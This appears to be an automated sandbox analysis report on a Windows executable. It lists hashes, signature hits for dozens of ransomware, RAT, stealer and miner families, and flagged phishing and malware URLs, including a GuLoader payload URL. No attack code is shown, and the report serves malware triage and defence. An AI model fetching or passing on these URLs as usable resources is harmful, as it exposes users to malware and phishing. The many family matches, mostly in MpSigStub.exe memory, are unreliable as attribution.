Windows Analysis Report 1gPmnCR2PX.exe

Overview

General Information

Sample Name: 1gPmnCR2PX.exe
Analysis ID: 1603
MD5: 5ffe281957d81c218b5851ea276ed82b
SHA1: 0fce1d74469b880820c8e6b2d52e4e0a206ee795
SHA256: ae4d46e3c772093c5ad9ee27e412f11e6be6923a1efeca80b1dba5d1fef8f62e
Infos:

Most interesting Screenshot:

Detection

RemCom RemoteAdmin Mimikatz GuLoader AESCRYPT Ransomware AveMaria Babuk BitCoin Miner
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PasteDownloader
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected Hacktool Mimikatz
Yara detected Discord Token Stealer
Yara detected BlackMoon Ransomware
Yara detected Parallax RAT
Yara detected Ragnarok ransomware
Yara detected Wannacry ransomware
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected Mini RAT
Yara detected Snatch Ransomware
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected RansomwareGeneric
Yara detected Coinhive miner
GuLoader behavior detected
Yara detected Gocoder ransomware
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Yara detected GuLoader
Yara detected Hancitor
Found malware configuration
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected Phorpiex smb component
Yara detected Clop Ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected UACMe UAC Bypass tool
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Yara detected AveMaria stealer
Yara detected Cryptolocker ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Growtopia
Yara detected RevengeRAT
Contains VNC / remote desktop functionality (version string found)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sample is not signed and drops a device driver
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Found string related to ransomware
Yara detected MSILLoadEncryptedAssembly
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
May drop file containing decryption instructions (likely related to ransomware)
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Contains functionality to detect virtual machines (SLDT)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://outfish.bounceme.net/outl.dot Avira URL Cloud: Label: phishing
Source: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email= Avira URL Cloud: Label: phishing
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.18689801595.00000000022B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://sopage.duckdns.org/Solex-RacoonStealer_JCgunCl163.bin"}
Multi AV Scanner detection for submitted file
Source: 1gPmnCR2PX.exe Virustotal: Detection: 22% Perma Link
Source: 1gPmnCR2PX.exe ReversingLabs: Detection: 17%
Yara detected Njrat
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: sopage.duckdns.org Virustotal: Detection: 5% Perma Link
Source: http://www.bonusesfound.ml/update/index.php Virustotal: Detection: 13% Perma Link
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Antivirus or Machine Learning detection for unpacked file
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5f670ae6.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

barindex
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AC1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary, 18_2_00007FF7E30AC1C4

Exploits:

barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Privilege Escalation:

barindex
Detected Hacktool Mimikatz
Source: MpSigStub.exe, 0000000B.00000003.18300229223.0000021B5E691000.00000004.00000001.sdmp String found in binary or memory: blog.gentilkiwi.com/mimikatz

Phishing:

barindex
Yara detected Phorpiex smb component
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Bitcoin Miner:

barindex
Yara detected Coinhive miner
Source: Yara match File source: 11.3.MpSigStub.exe.21b5de9cd89.108.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e61fb1a.216.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdeb9e.86.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e9002fe.65.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e61fb1a.194.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef2f28f.123.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e61fb1a.149.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e58feb1.191.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ee2f2ee.94.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e5ccab6.147.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f2492b6.171.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdeb9e.188.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdc99a.87.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e8eadb4.64.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e4c313e.156.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e4c3d42.158.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ee2f2ee.94.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e2d6a62.67.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5de9f3dd.109.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e4c253a.157.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e5ccab6.147.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e61fb1a.206.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f2492b6.84.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdc99a.187.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f2492b6.107.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e58d85d.192.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e2d6a62.67.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18302835383.0000021B5E610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18287769484.0000021B5FA6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18308013985.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18298197645.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18283413145.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18305104252.0000021B5E24E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18318083776.0000021B5E610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18286653567.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18267332795.0000021B5E8A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18310588191.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18314132801.0000021B5FCD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18263077729.0000021B5E24E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18296480454.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18315332687.0000021B5E610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18301726224.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18311695219.0000021B5FA6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18308803953.0000021B5F264000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18285459403.0000021B5DE04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18305427613.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18281404949.0000021B5F264000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18292386350.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18309993553.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18308889341.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f94bc01.210.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f94bc01.172.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f94bc01.135.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f94bc01.57.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18309206155.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18273280892.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18299369351.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f17d101.92.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fb37126.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdeb9e.86.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e9002fe.65.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.63.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f17da55.91.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fb38b2a.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.95.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdeb9e.188.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdc99a.87.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f17c82d.93.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f6a42d1.51.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.209.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fcdc99a.187.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f6939bd.52.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18265560901.0000021B5F5C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18319052048.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18308013985.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18316812162.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18319660937.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18314132801.0000021B5FCD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18301726224.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18298785440.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18261979312.0000021B5F5C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18305427613.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18274964838.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
